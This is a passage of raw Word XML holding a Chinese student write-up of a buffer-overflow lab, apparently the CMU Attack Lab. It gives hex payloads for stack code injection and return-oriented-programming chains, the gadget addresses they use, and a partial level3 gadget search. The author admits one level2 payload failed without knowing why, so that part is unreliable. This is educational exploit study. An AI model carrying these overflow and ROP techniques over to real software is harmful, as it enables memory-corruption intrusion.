        <w:t>’\0’</w:t>
      </w:r>
      <w:r w:rsidR="004061E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的所有字符（大端序）。那么我们构造的sval字符串的字节码就要应该是：</w:t>
      </w:r>
      <w:r w:rsidR="004061E0" w:rsidRPr="004061E0">
        <w:t>35 39 62 39 39 37 66 61</w:t>
      </w:r>
      <w:r w:rsidR="000967DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，知道了要构造的字符串之后还要想办法将它作为参数传到rdi里面。我们可以将它保存到栈中的某个位置，因为在调用函数的时候getbuf栈帧的部分可能会因为正常调用hexmatch函数</w:t>
      </w:r>
      <w:r w:rsidR="00B26C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidR="000967DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破坏，所以我们在缓冲区下</w:t>
      </w:r>
      <w:r w:rsidR="00B26C6D">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="000967DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字</w:t>
      </w:r>
      <w:r w:rsidR="00B26C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节填充所需的字符串，就算破坏其它栈帧也没有关系，只要能执行就ok。那么很容易构造payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DDF049" w14:textId="77777777" w:rsidR="00B26C6D" w:rsidRDefault="00B26C6D" w:rsidP="00B26C6D">
      <w:r>
        <w:t xml:space="preserve">48 c7 c7 a8 dc 61 55 68 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B581196" w14:textId="77777777" w:rsidR="00B26C6D" w:rsidRDefault="00B26C6D" w:rsidP="00B26C6D">
      <w:r>
        <w:t>fa 18 40 00 c3 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA78514" w14:textId="77777777" w:rsidR="00B26C6D" w:rsidRDefault="00B26C6D" w:rsidP="00B26C6D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A92517" w14:textId="77777777" w:rsidR="00B26C6D" w:rsidRDefault="00B26C6D" w:rsidP="00B26C6D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51008825" w14:textId="77777777" w:rsidR="00B26C6D" w:rsidRDefault="00B26C6D" w:rsidP="00B26C6D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73D467" w14:textId="77777777" w:rsidR="00B26C6D" w:rsidRDefault="00B26C6D" w:rsidP="00B26C6D">
      <w:r>
        <w:t xml:space="preserve">78 dc 61 55 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A83402" w14:textId="77777777" w:rsidR="00B26C6D" w:rsidRDefault="00B26C6D" w:rsidP="00B26C6D">
      <w:r>
        <w:t xml:space="preserve">35 39 62 39 39 37 66 61 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE706A" w14:textId="0206FF62" w:rsidR="00B26C6D" w:rsidRDefault="00B26C6D" w:rsidP="00B26C6D">
      <w:r>
        <w:t>00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61801284" w14:textId="28669B21" w:rsidR="00540225" w:rsidRDefault="00540225" w:rsidP="00B26C6D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意最后一位要0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填充，因为字符串是要到0</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才结束的，如果不是那么就会一直进行下去。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A113E" w14:textId="38ACF67E" w:rsidR="00540225" w:rsidRDefault="00281CBE" w:rsidP="00281CBE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rt</w:t>
      </w:r>
      <w:r>
        <w:t>arget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AFFC16" w14:textId="1F5EA618" w:rsidR="00540225" w:rsidRDefault="00281CBE" w:rsidP="00281CBE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>evel</w:t>
      </w:r>
      <w:r w:rsidR="009052C3">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458FD243" w14:textId="67103971" w:rsidR="00BB1A08" w:rsidRDefault="00006461" w:rsidP="00BB1A08">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个官方的wp已经明确说了，栈只读，因此得采取rop的方式取攻击执行touch</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8BE8A" w14:textId="36CE3F1F" w:rsidR="00D07074" w:rsidRDefault="00F30569" w:rsidP="00BB1A08">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们使用objdump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -d rtarget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去查看代码碎片看看哪里可以利用。首先我们想的应该是，m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq $0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00F30569">
        <w:t>59b997fa</w:t>
      </w:r>
      <w:r w:rsidR="00D07074">
        <w:t>,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A778558" w14:textId="77777777" w:rsidR="006F742F" w:rsidRDefault="006F742F" w:rsidP="006F742F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ushq $0x4017ec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564368F8" w14:textId="77777777" w:rsidR="006F742F" w:rsidRDefault="006F742F" w:rsidP="006F742F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>etq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21585F1B" w14:textId="2838F323" w:rsidR="00D07074" w:rsidRDefault="006334FF" w:rsidP="006F742F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是发现你根本找不到m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq $0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00F30569">
        <w:t>59b997fa</w:t>
      </w:r>
      <w:r>
        <w:t>,%rdi</w:t>
      </w:r>
      <w:r w:rsidR="00C10327">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以这个方法略掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD43CA4" w14:textId="61BB7DD5" w:rsidR="00C10327" w:rsidRDefault="00C10327" w:rsidP="006F742F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那还有plan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B：在栈上rsp里面装入那个数然后popq弹到rdi里面就好了，那么我们想的就是，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D74362" w14:textId="02F97283" w:rsidR="00C10327" w:rsidRDefault="00C10327" w:rsidP="006F742F">
      <w:r>
        <w:t>popq %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E171A05" w14:textId="77777777" w:rsidR="00C10327" w:rsidRDefault="00C10327" w:rsidP="00C10327">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ushq $0x4017ec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474E0031" w14:textId="77777777" w:rsidR="00C10327" w:rsidRDefault="00C10327" w:rsidP="00C10327">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>etq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B109B" w14:textId="03868963" w:rsidR="006D6767" w:rsidRDefault="00F30D32" w:rsidP="006F742F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们搜索一下p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">opq %rdi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字节码5</w:t>
      </w:r>
      <w:r w:rsidR="00B8155B">
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00BA19EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现4</w:t>
      </w:r>
      <w:r w:rsidR="00BA19EB">
        <w:t>023</w:t>
      </w:r>
      <w:r w:rsidR="00B8155B">
        <w:t>3a</w:t>
      </w:r>
      <w:r w:rsidR="00BA19EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有一个5</w:t>
      </w:r>
      <w:r w:rsidR="00B8155B">
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00BA19EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E786406" w14:textId="58A69FED" w:rsidR="00BA19EB" w:rsidRDefault="00216868" w:rsidP="006F742F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B5237B8" wp14:editId="6C30418B">
            <wp:extent cx="4900085" cy="1905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B20" w14:textId="10A187E2" w:rsidR="0015169E" w:rsidRDefault="0015169E" w:rsidP="006F742F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那就很容易构造payload了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CBBD3" w14:textId="77777777" w:rsidR="0071130D" w:rsidRDefault="0071130D" w:rsidP="0071130D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE2C38" w14:textId="77777777" w:rsidR="0071130D" w:rsidRDefault="0071130D" w:rsidP="0071130D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F364BF" w14:textId="77777777" w:rsidR="0071130D" w:rsidRDefault="0071130D" w:rsidP="0071130D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CBC4B" w14:textId="77777777" w:rsidR="0071130D" w:rsidRDefault="0071130D" w:rsidP="0071130D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498058F8" w14:textId="77777777" w:rsidR="0071130D" w:rsidRDefault="0071130D" w:rsidP="0071130D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2061F" w14:textId="6F5EAC3B" w:rsidR="0071130D" w:rsidRDefault="006000EC" w:rsidP="0071130D">
      <w:r>
        <w:t>3a</w:t>
      </w:r>
      <w:r w:rsidR="0071130D">
        <w:t xml:space="preserve"> 23 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0911BFE9" w14:textId="77777777" w:rsidR="0071130D" w:rsidRDefault="0071130D" w:rsidP="0071130D">
      <w:r>
        <w:t>fa 97 b9 59 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE6ADE3" w14:textId="4F41649F" w:rsidR="0015169E" w:rsidRDefault="0071130D" w:rsidP="0071130D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ec 17 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE08B9" w14:textId="1AB43C65" w:rsidR="00F3294B" w:rsidRDefault="00575522" w:rsidP="0071130D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F7DB175" wp14:editId="5BBAEE1A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DDE" w14:textId="5A8EA106" w:rsidR="00021284" w:rsidRDefault="00021284" w:rsidP="0071130D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事实上这里我是没有攻击成功的</w:t>
      </w:r>
      <w:r w:rsidR="00B8155B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我觉得从逻辑上来讲是没有任何</w:t>
      </w:r>
      <w:r w:rsidR="00131435">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题的，有大佬看到蒟蒻的小错误恳请帮忙指正。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC4383A" w14:textId="69C1C5B0" w:rsidR="00C54BD4" w:rsidRDefault="00C54BD4" w:rsidP="0071130D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么正确的做法是先把它pop到rax寄存器里面，然后执行m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C9D5B7" w14:textId="3E9A6E87" w:rsidR="00C54BD4" w:rsidRDefault="00C54BD4" w:rsidP="0071130D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？？？到底有啥区别嘛，还是搞不懂。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C55C576" w14:textId="35EDCAC6" w:rsidR="0036557E" w:rsidRDefault="0036557E" w:rsidP="0071130D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么代码就是:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88D6FB" w14:textId="66C2717D" w:rsidR="0036557E" w:rsidRDefault="0036557E" w:rsidP="0071130D">
      <w:r>
        <w:t>popq %rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88B521" w14:textId="587D8F1F" w:rsidR="0036557E" w:rsidRDefault="0036557E" w:rsidP="0071130D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E86DD4" w14:textId="27BFCB9F" w:rsidR="0036557E" w:rsidRDefault="0036557E" w:rsidP="0071130D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F34D6F" w14:textId="3E5EF4A1" w:rsidR="00EF4F76" w:rsidRDefault="00EF4F76" w:rsidP="0071130D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造出来的payload就是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331C8DF" w14:textId="77777777" w:rsidR="00551186" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3BFD2" w14:textId="77777777" w:rsidR="00551186" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D12A698" w14:textId="77777777" w:rsidR="00551186" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DF4C0" w14:textId="77777777" w:rsidR="00551186" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F35A4A" w14:textId="77777777" w:rsidR="00551186" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBC258" w14:textId="77777777" w:rsidR="00551186" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t>ab 19 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB6E4E" w14:textId="77777777" w:rsidR="00551186" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t>fa 97 b9 59 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078372FE" w14:textId="77777777" w:rsidR="00551186" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t>a2 19 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB9C27" w14:textId="6BAF6D13" w:rsidR="00EF4F76" w:rsidRDefault="00551186" w:rsidP="00551186">
      <w:r>
        <w:t>ec 17 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F855A2" w14:textId="1D1BAF71" w:rsidR="007D5BCD" w:rsidRDefault="00273306" w:rsidP="00551186">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A26560C" wp14:editId="015CB578">
            <wp:extent cx="5274310" cy="445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B7F6" w14:textId="0AD364DF" w:rsidR="007F1ED3" w:rsidRDefault="007F1ED3" w:rsidP="00551186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个应该不难，但是我还是想知道我的哪里有问题</w:t>
      </w:r>
      <w:r w:rsidR="007D5BCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>！！！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD17B40" w14:textId="5FA9A194" w:rsidR="00236035" w:rsidRDefault="00236035" w:rsidP="00236035">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>level3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A89FE2" w14:textId="78951EE9" w:rsidR="00E84F13" w:rsidRDefault="00E84F13" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先想想我们要干嘛？</w:t>
      </w:r>
      <w:r w:rsidR="00A82395">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造在一个特殊的地方构造字符串然后把字符串字符首地址传给rdi就能直接攻击成功。</w:t>
      </w:r>
      <w:r w:rsidR="001B519C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启了栈只读和地址随机化，那么我们还是只能通过栈去溢出，肯定是要先把</w:t>
      </w:r>
      <w:r w:rsidR="002310B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串写</w:t>
      </w:r>
      <w:r w:rsidR="001B519C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在后面，中间全是gadget</w:t>
      </w:r>
      <w:r w:rsidR="002310B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00FD10D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后通过确定rsp的值以及我们已构造的gadget，我们就可以很轻松地获得字符串地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCFDC3D" w14:textId="5B9F03BD" w:rsidR="000C5F80" w:rsidRDefault="000C5F80" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么我们需要的汇编代码就是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F5CF9" w14:textId="28B5C362" w:rsidR="000C5F80" w:rsidRDefault="000C5F80" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq %rsp,%rdi</w:t>
      </w:r>
      <w:r w:rsidR="009A0E33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A0E33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>×</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60154384" w14:textId="7E5F78EB" w:rsidR="009A0E33" w:rsidRDefault="00DF6601" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq %rsp,%rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAED81E" w14:textId="3E73D450" w:rsidR="00DF6601" w:rsidRDefault="00386A8A" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ovq %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4CB63" w14:textId="11186636" w:rsidR="00386A8A" w:rsidRDefault="002F6072" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidR="00C04383">
        <w:t xml:space="preserve"> $offset,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46D8A2" w14:textId="47184947" w:rsidR="00C04383" w:rsidRDefault="009E3EDD" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BFFED0" w14:textId="344D35D5" w:rsidR="009E3EDD" w:rsidRDefault="002F6072" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里主要是</w:t>
      </w:r>
      <w:r w:rsidR="007A4B59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>add这条指令，别问我为什么刚才的思路打断了，都是上面那个level</w:t>
      </w:r>
      <w:r w:rsidR="007A4B59">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007A4B59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搞得，就佛系一点把，先把它传给rax再给rdi也一样的，即使我不知道一步到位为什么不行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1116EC39" w14:textId="15CB9D8A" w:rsidR="007A4B59" w:rsidRDefault="007A4B59" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来是寻找gadget了。</w:t>
      </w:r>
      <w:r w:rsidR="006C5DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其它的都能很好找到，唯独add这条指令不好搞，但是我们可以大致看一下规律。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F678402" w14:textId="01402882" w:rsidR="003C6658" w:rsidRDefault="003C6658" w:rsidP="00E84F13"/>
    <w:p w14:paraId="155EA64C" w14:textId="27C12151" w:rsidR="003C6658" w:rsidRDefault="003C6658" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20FD253B" wp14:editId="2A8A0B0C">
            <wp:extent cx="4503810" cy="27739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F89E" w14:textId="593E0598" w:rsidR="00787A8C" w:rsidRDefault="00787A8C" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以很清晰地发现，add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %xxx,%rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的一般规律就是 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">48 83 c7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后后面一个字节确定立即数的大小那么就去搜索一下</w:t>
      </w:r>
      <w:r>
        <w:t>48 83 c7</w:t>
      </w:r>
      <w:r w:rsidR="00877A20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是很快就会发现，搜不到这个gadget。那么换一种思路，既然我们先传给了rax那我们可以先让rax加上那个值啊。说干就干，汇编再反之后得到字节码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B698012" w14:textId="77BB251E" w:rsidR="007D27F3" w:rsidRDefault="007D27F3" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63494E09" wp14:editId="0E43A476">
            <wp:extent cx="3962743" cy="12574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859" w14:textId="69A33679" w:rsidR="009319FF" w:rsidRDefault="009319FF" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那我们接着寻找4</w:t>
      </w:r>
      <w:r>
        <w:t>8 05 00</w:t>
      </w:r>
      <w:r w:rsidR="00C64C68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现还是找不到，一筹莫展之际，你突然想到，可以利用寄存器的低位，他们的操作码也有很大区别的，比如</w:t>
      </w:r>
      <w:r w:rsidR="00A739A3">
        <w:t>rax</w:t>
      </w:r>
      <w:r w:rsidR="00A739A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的低3</w:t>
      </w:r>
      <w:r w:rsidR="00A739A3">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A739A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位是eax，低1</w:t>
      </w:r>
      <w:r w:rsidR="00A739A3">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00A739A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位是ax，低8位是al，我们一个个找过去发现add</w:t>
      </w:r>
      <w:r w:rsidR="00A739A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A739A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>al有一个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356DA8A2" w14:textId="48B9E89F" w:rsidR="00D61F8C" w:rsidRDefault="00D61F8C" w:rsidP="00E84F13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
